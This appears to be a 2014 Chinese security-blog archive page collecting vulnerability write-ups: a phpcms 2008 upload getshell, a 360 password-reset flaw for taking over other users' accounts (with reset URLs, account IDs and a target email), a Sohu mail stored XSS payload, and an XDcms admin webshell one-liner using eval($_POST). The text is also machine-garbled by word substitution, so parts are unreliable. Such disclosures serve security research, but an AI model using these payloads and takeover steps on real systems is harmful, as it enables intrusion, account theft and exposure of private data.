月度归档:2014年01月

phpcms前台和(后台低权限)getshell1

1、首先先说前台的吧,估量许多站都最先补了。是针对phpcms 2008的,二次进击领域,二次解析getshell。

在upload_field.php中

 
  <br />  $upload_allowext = !empty($C['upload_allowext']) 烦忙 $C['upload_allowext'] : $info['upload_allowext'];</p>  <p>    // 触发点   经由进程变量笼盖$upload_allowext此变量赋值为html</p>  <p>$upload_maxsize = !empty($C['upload_maxsize']) 烦忙 $C['upload_maxsize'] : $info['upload_maxsize']*1024;</p>  <p>$isthumb = isset($C['thumb_enable']) 烦忙 $C['thumb_enable'] : ($CMS['thumb_enable'] && $info['isthumb'] 烦忙 1 : 0);</p>  <p>$iswatermark = isset($C['watermark_enable']) 烦忙 $C['watermark_enable'] : ($PHPCMS['watermark_enable'] && $info['iswatermark'] 烦忙 1 : 0);</p>  <p>$thumb_width = isset($width) 烦忙 $width : (isset($C['thumb_width']) 烦忙 $C['thumb_width'] : ($info['thumb_width'] 烦忙 $info['thumb_width'] : $PHPCMS['thumb_width']));</p>  <p>$thumb_height = isset($height) 烦忙 $height : (isset($C['thumb_height']) 烦忙 $C['thumb_height'] : ($info['thumb_height'] 烦忙 $info['thumb_height'] : $PHPCMS['thumb_height']));</p>  <p>$watermark_img = PHPCMS_ROOT.($info['watermark_img'] 烦忙 $info['watermark_img'] : $PHPCMS['watermark_img']);</p>  <p>$attachment = new attachment($mod);  //实例化attachment上传类</p>  <p>if($dosubmit)</p>  <p>{</p>  <p>   $attachment->upload($uploadtext, $upload_allowext, $upload_maxsize, 1);</p>  <p>          // 马脚触发点  援用attachment上传类<br />

 

继续阅读

360任意用户密码修改

360随意率性用户密码点窜(危机360手机卫士、360云盘、360云同步,可泄露通讯录、短信、通话记载等)

还有某女明星账号哦!
ps:红黑了好几个360高管的邮箱,结果人家根基就没用自己的产物…
 
本小先生忘性欠好,360账号的密码很实时的遗忘了。 
 
于是有了如下情节。
 
找回账号密码, 然后发了一篇邮件到我邮箱。
 
http://i.360.cn/findpwd/setpwdfromemail烦忙=e%2FwljiqD9WGv%2FwDyS93BghveGh%2FDYG4oMjJwcxGlcnSDZP3qIW4deYwnCpkdbCSZ3ByODXHZYDCx32A46l%2FBXxk6qo5oABIr6ZrywAoPB8DZuX81j%2Bb%2F2w%3D%3D&qid=507290669
 
这是点窜密码的毗邻地址 有没有发现亮点?
 
qid=507290669 qid假设被点窜他人的能否会有用呢
 
然后点窜为
http://i.360.cn/findpwd/setpwdfromemail烦忙vc=e%2FwljiqD9WGv%2FwDyS93BghveGh%2FDYG4oMjJwcxGlcnSDZP3qIW4deYwnCpkdbCSZ3ByODXHZYDCx32A46l%2FBXxk6qo5oABIr6ZrywAoPB8DZuX81j%2Bb%2F2w%3D%3D&qid=507290670
 
 
然后360网站提示可以点窜 哦的天啊 
 
那这样的话不是一切的账号都可以改了 为什么会鸡肋呢?
 
效果是不知道他人的账号啊 出来小我中心也没有这个id提示
 
别焦炙 我们继续挖 
 
发现360旗下的一个网站:
 
http://www.woxihuan.com/
 
http://www.woxihuan.com/star/timeline烦忙qid=268296138
 
 
是不是发现了什么烦忙 没错 qid=268296138
 
这个qid 我们找的是明星苗圃的
 
然后组织如下链接:
 
http://i.360.cn/findpwd/setpwdfromemail烦忙vc=e%2FwljiqD9WGv%2FwDyS93BghveGh%2FDYG4oMjJwcxGlcnSDZP3qIW4deYwnCpkdbCSZ3ByODXHZYDCx32A46l%2FBXxk6qo5oABIr6ZrywAoPB8DZuX81j%2Bb%2F2w%3D%3D&qid=268296138
 
 
我们寄入迷器 Burpsuite
 
内行使找回密码链接点窜密码时 我们截取它post的包

360任意用户密码修改

 
 360任意用户密码修改

360任意用户密码修改

 
 
而且这里还发现 我们在知道邮箱 不知道qid的景遇下 也可以点窜密码:
 
首先用自己的账号获取一个360找回密码的url,然后在点窜密码时截包
360任意用户密码修改
 
 
我们把这里的uname点窜为要点窜密码的目标的邮箱
 
360任意用户密码修改
 
目标邮箱:410316816@qq.com
 
360任意用户密码修改
 
 
可以点窜指定邮箱的密码

攻击JavaWeb应用[9]-Server篇[2]

注:在继后门篇后曾经有很长时分没更新了,此次一筹算写写Server[1]的续集。喜好B/S吗?那我们明天爽性就来写一个复杂的“Web干事器”吧。

0×01 WebServer

Web干事器可以解析(handles)HTTP和谈。当Web干事器领遭到一个HTTP央求(request),会前往一个HTTP照应(response),例如送回一个HTML页面。

Server篇其实还贫乏了JBOSS和Jetty,本筹算放到Server[2]写的。然则此次重点在于和人人分享B/S完成和交互手艺。Server[1]曾经给人人引见了许多由Java完成 的WebServer置信小同伴们对Server的概念不再生疏了。Web干事器焦点是凭证HTTP和谈解析(Request)和措置责罚(Response)来自客户端的央求,若何去解析和照应来自客户端的央求恰是我们明天的主题。

继续阅读

搜狐邮箱存储型XSS(需点击)

对用户输入过滤不严,招致可植入恶意代码。

 
payload:
 
<svg><a xlink:href="javascript:alert(document.domain)" target="_blank"><text>AAAAA</text></a></svg>
 
<image>和<rect>之类的,由于被过滤了width和heigth就没法行使了。不外照样可以拔出<text>来处置效果。然则缺乏之处就是没法调整字体巨细(各类过滤- -)且需求点击。然则假设频频拔出一个payload屡次,照样可以扩年夜肯定的点击面积的。
 
该payload在IE10,IE11,Firefox25(最新版本),chrome31(最新版本)下均有用,所以照样有点影响局限的。
 
 搜狐邮箱存储型XSS(需点击)
 
修复方案:

我简直想不到一个邮件需求支撑用户写入svg标签或许答运用户应用xlink:href属性的因由

 

XDcms全版本后台getshell

xdcms后台网站设置装备摆设根基信息的网站途径处过滤不严,仍可以插一句话拿shell。

前提 magic_quotes_gpc=Off
XDcms全版本后台getshell
1.进后台,在根基信息中的网站途径处添加一句话,由于尖括号被转码,然则可以添加花括号型的一句话,${eval($_POST['rua'])}。
 
2.一句话写入在/system/xdcms.inc.php中。

 
修复方案:

过滤花括号